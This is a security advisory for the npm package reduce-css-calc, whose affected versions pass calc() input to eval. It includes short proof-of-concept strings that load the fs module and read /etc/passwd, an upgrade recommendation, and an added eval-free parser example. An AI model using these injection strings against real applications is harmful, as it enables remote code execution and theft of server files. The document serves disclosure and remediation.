nodejs | Сковорода Никита Андреевич | NODEJS:144
Aug 25, 2016 - 1:21 p.m.

Arbitrary Code Injection

2016-08-25 13:21:44
www.npmjs.com

EPSS: 0.002
Percentile: 56.6%

Overview

Affected versions of reduce-css-calc pass input directly to eval. If user input is passed into the calc function, this may result in cross-site scripting on the browser, or remote code execution on the server.

Proof of Concept

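// In affected versions the text inside calc(...) is passed to eval().
const reduceCSSCalc = require('reduce-css-calc');
// An arbitrary expression runs in the host process: here it allocates a Buffer.
console.log(reduceCSSCalc(`calc(                       (Buffer(10000)))`));
// require() is reachable from the evaluated text; fs is stored on global.
console.log(reduceCSSCalc(`calc(                       (global['fs'] = require('fs')))`));
// The stored module is then used to read a local file.
console.log(reduceCSSCalc(`calc(                       (fs['readFileSync']("/etc/passwd", "utf-8")))`));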

Recommendation

Update to version 1.2.5 or later.
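
The eval call described in the Overview can be avoided altogether by parsing the arithmetic instead. The following is an added example, not code from this advisory or from reduce-css-calc: the name safeCalc and its unitless grammar (numbers, + - * /, parentheses) are assumptions for illustration. Any other character, including every string in the Proof of Concept, is rejected during tokenization.

```javascript
// Added example, not reduce-css-calc's code: evaluate calc()-style arithmetic
// with a recursive-descent parser so no input ever reaches eval().
// safeCalc and its grammar (numbers, + - * /, parentheses) are assumptions.
function safeCalc(input) {
  const src = String(input).trim();
  const re = /\s*(?:(\d+(?:\.\d+)?|\.\d+)|([-+*/()]))/y; // number | operator
  const tokens = [];
  while (re.lastIndex < src.length) {
    const at = re.lastIndex;
    const m = re.exec(src); // sticky: must match exactly at lastIndex
    if (!m) throw new SyntaxError(`unexpected input at offset ${at}`);
    tokens.push(m[1] !== undefined ? Number(m[1]) : m[2]);
  }
  let i = 0;
  const peek = () => tokens[i];
  const next = () => tokens[i++];
  function primary() {
    const t = next();
    if (typeof t === 'number') return t;
    if (t === '-') return -primary(); // unary minus
    if (t === '(') {
      const v = expr();
      if (next() !== ')') throw new SyntaxError('expected ")"');
      return v;
    }
    throw new SyntaxError('expected number or "("');
  }
  function term() { // * and / bind tighter than + and -
    let v = primary();
    while (peek() === '*' || peek() === '/') {
      const op = next();
      const r = primary();
      v = op === '*' ? v * r : v / r;
    }
    return v;
  }
  function expr() {
    let v = term();
    while (peek() === '+' || peek() === '-') {
      const op = next();
      const r = term();
      v = op === '+' ? v + r : v - r;
    }
    return v;
  }
  const result = expr();
  if (i !== tokens.length) throw new SyntaxError('trailing input');
  if (!Number.isFinite(result)) throw new RangeError('non-finite result');
  return result;
}
```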
